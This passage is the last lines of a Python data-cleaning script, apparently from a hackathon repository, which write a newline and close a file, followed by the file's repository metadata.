writeFile.write('\\n')\nwriteFile.close()","repo_name":"Uraniluib/CrimsonCode_Hackathon_Project","sub_path":"Code/DataProcessing/cleanData.py","file_name":"cleanData.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}